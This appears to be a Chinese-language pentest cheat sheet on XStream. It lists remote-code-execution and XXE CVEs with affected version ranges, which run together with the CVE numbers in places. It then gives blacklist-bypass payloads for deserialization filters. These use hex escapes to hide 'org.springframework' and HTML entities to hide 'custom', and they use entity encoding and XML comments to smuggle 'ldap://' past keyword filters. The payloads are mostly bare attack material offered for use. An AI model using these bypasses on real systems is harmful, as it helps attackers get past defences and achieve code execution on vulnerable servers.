XStream 远程代码执行漏洞CVE-2013-72851.4.x<XStream 1.4.6&=1.4.10
XStream XXECVE-2016-36741.4.x<XStream 1.4.8
XStream 远程代码执行漏洞CVE-2019-10173XStream = 1.4.10
XStream 远程代码执行漏洞CVE-2020-262171.4.x<XStream 1.4.13
XStream 远程代码执行漏洞CVE-2021-213441.4.x<XStream: 1.4.15
XStream 远程代码执行漏洞CVE-2021-213451.4.x<XStream: 1.4.15
XStream 远程代码执行漏洞CVE-2021-213461.4.x<XStream: 1.4.15
XStream 远程代码执行漏洞CVE-2021-213471.4.x<XStream 1.4.15
XStream 远程代码执行漏洞CVE-2021-213501.4.x<XStream: 1.4.15
XStream 远程代码执行漏洞CVE-2021-213511.4.x<XStream: 1.4.15
XStream 远程代码执行漏洞CVE-2021-295051.4.x<XStream: 1.4.16
XStream 远程代码执行漏洞CVE-2021-391411.4.x<XStream: 1.4.17
XStream 远程代码执行漏洞CVE-2021-391441.4.x<XStream: 1.4.17
XStream 远程代码执行漏洞CVE-2021-391461.4.x<XStream: 1.4.17
XStream 远程代码执行漏洞CVE-2021-391481.4.x<XStream: 1.4.17
XStream 远程代码执行漏洞CVE-2021-391521.4.x<XStream: 1.4.17
XStream 远程代码执行漏洞CVE-2021-391541.4.x<XStream: 1.4.17

bypass

16 进制绕过

黑名单为:org[.]springframework payload:

<org.s_.0070ringframework.aop.support.AbstractBeanFactoryPointcutAdvisor>
</org.s_.0070ringframework.aop.support.AbstractBeanFactoryPointcutAdvisor>

针对标签属性内容的绕过

黑名单:custom payload:

<org.springframework.aop.support.AbstractBeanFactoryPointcutAdvisor serialization="cust&#111;m">
</org.springframework.aop.support.AbstractBeanFactoryPointcutAdvisor>

针对标签内容的绕过

黑名单:ldap:// payload:

1. html 编码
<test>
&#108;dap://xxxxx
</test>
 
2. 注释
<test>
ld<!-- test -->ap://xxxxx
</test>